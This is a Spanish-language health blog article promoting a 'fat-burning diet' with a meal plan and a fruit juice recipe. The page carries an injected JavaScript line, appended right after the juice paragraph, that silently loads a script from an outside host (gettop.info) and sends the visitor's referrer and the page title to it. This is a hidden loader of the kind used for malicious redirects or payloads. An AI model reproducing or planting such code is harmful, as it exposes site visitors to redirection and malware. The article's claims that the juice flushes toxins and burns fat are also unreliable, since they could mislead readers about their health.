Salud y belleza » Alimentación, Salud

Dieta quemagrasa, su nombre lo dice todo

Sin Comentarios

 

dieta-quemagrasa

Su nombre parece ser, en efecto, una prueba de calidad: “dieta quemagrasa”.

No hace falta, como vemos, entender demasiado para darse cuenta de que va este plan alimentario: “La dieta quemagrasa es un método práctico para bajar de peso en poco tiempo. La clave de esta dieta es, por supuesto, la combinación de un control entre comidas junto con la práctica de ejercicio. Se recomienda hacer diariamente entre una y una hora y media de ejercicios con pesas” dice una autoridad en la materia.

 

Este plan está considerado como un término medio entre las dietas rigurosas y las permisivas y es ideal para aquellos que prefieren no realizar una estricta suspensión de alimentos sino, en cambio, apostar al “largo plazo”.

 

Para ver los resultados de la “dieta quemagrasa” se debe llevar a cabo el plan durante, mínimamente, tres meses.

 

¿En que consiste esta formula alimenticia? Aquí te lo presentamos…

 

Desayuno

 

1 Taza de melón

1 sándwich de pechuga de pavo con pan integral

 

Almuerzo

 

1 taza de puré de papa

1 taza de atún en agua

 1 taza de lechuga y brócoli

 

Comida

 

2 tazas de arroz al vapor (integral)

1 taza de espinacas cocidas

300 grs. de carne, pollo o pescado

 

Cena

 

1 jitomate

1 zanahoria

1 taza de lechuga

1 gelatina

1 taza de jícama

 

Relacionado con esta dieta, existe también una infusión obviamente denominada “jugo quemagrasa”. El mismo se prepara de la siguiente manera…

 

Los ingredientes son: 1/2 taza de papaya picada sin cáscara ni semillas, 1/4 de taza de piña picada sin cáscara, 2 rebanadas de sandía picada sin cáscara ni semillas, 1 plátano maduro picado sin cáscara, 1 y 1/2 taza de agua.

¿Cómo se toma? Se debe, ante todo extraer el jugo de papaya y piña para luego licuar con el resto de los ingredientes. Más tarde, se cuela y se bebe (se puede tomar un vaso antes del desayuno y antes de la comida).

 

Este brebaje sirve especialmente para ayudar a eliminar las toxinas del cuerpo a través de la orina y la transpiración: a diferencia de la dieta, que se aplica durante tres meses, el jugo quemagrasa lo puedes beber durante el lapso de tiempo que considereis necesario. Por otra parte, esta bebida está considerada un laxante natural, ideal para personas que padecen estreñimiento y otras problemáticas similares.var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.